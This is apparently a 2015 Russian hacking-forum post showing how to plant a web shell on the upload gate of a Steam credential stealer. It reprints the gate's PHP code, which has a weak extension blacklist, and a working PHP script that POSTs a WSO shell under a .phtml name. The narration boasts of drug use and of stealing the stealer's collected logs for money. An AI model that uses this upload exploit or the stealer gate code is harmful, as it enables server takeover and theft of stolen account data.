Информация Steam Stealer by amfi — Заливка шелла [2015]

Сегодня я вам расскажу, как совсем недавно можно было залить шелл через гейт стим-стилера от amfi.


Код гейта выглядел следующим образом:

Code:

?php
$ip = $_SERVER[REMOTE_ADDR];
$uploaddir = "$ip/";

echo "Полный путь - ". $_SERVER[DOCUMENT_ROOT] ." br />";

if (is_uploaded_file($_FILES[file][tmp_name])) {

if (!is_dir($ip)) {
mkdir($ip);
}

$uploadfile = $uploaddir . basename($_FILES[file][name]);
echo "File ". $_FILES[file][name] ." uploaded successfully. ";

$black = /.(com|bat|exe|cmd|vbs|msi|jar|php|access|js)$/i;

if (preg_match($black, $_FILES[file][name]))
{
exit ("Fuck you!");
}

if (move_uploaded_file($_FILES[file][tmp_name], $uploadfile)) {
echo "File is valid, and was successfully moved. ";
}

else
print_r($_FILES);
}

else {
echo "Upload Failed!!!";
print_r($_FILES);
}
?>​

Больше всего привлекла внимание эта регулярка:

$black = /.(com|bat|exe|cmd|vbs|msi|jar|php|access|js)$/i;
Очевидно, что расширение .phtml/.phtm успешно пройдет проверку. Несколько дорожек убойного мексиканского метамфитамина и в течении нескольких секунд был написан кодес для заливки:

Code:

?php
define(MULTIPART_BOUNDARY, --------------------------.microtime(true));
define(FORM_FIELD, file);
//Адрес гейта, надо предварительно отснифать.
$url = "http://1.2.3.4/papka_stillera/index.php";
$header = Content-Type: multipart/form-data; boundary=.MULTIPART_BOUNDARY;
//Шелл должен лежать в папке с этим скриптом, в данном случае это wso2.php
$filename = "wso2.php";
$file_contents = file_get_contents($filename);

//Имя для сохранения шелла на сервере
$filename="fuck.phtml";
$content = "--".MULTIPART_BOUNDARY."
".
"Content-Disposition: form-data; name="".FORM_FIELD.""; filename="".basename($filename).""
".
"Content-Type: application/zip

".
$file_contents."
";

$content .= "--".MULTIPART_BOUNDARY."--
";
$context = stream_context_create(array(
http => array(
method => POST,
header => $header,
content => $content,
timeout => 10
)
));
@file_get_contents(trim($url), false, $context);​

Ставлю винт по вене, судорожно выпрашиваю билд стилера у всех в ростере. Через несколько мгновений получаю билд, запускаю на виртуалке, Wireshark успешно ловит адрес гейта:



Отлично. Немного LSD прямо в жопную мышцу. Розовая щупальца с глазами в виде пушистых кошечек запускает скриптенг для заливки. Шелл залит:



Можно воровать отчеты. А это значит, что вопрос с деньгами на завтраки в школе (а сталобыть и на пакетик спайса) решен. Еще несколько билдов... Еще несколько шеллов...

Excellent...



Ах, да, забыл сказать...
В новых версиях стилера багу успешно пофиксили.
Все описанное выше происходило несколько месяцев назад.

© r00t

2015 год...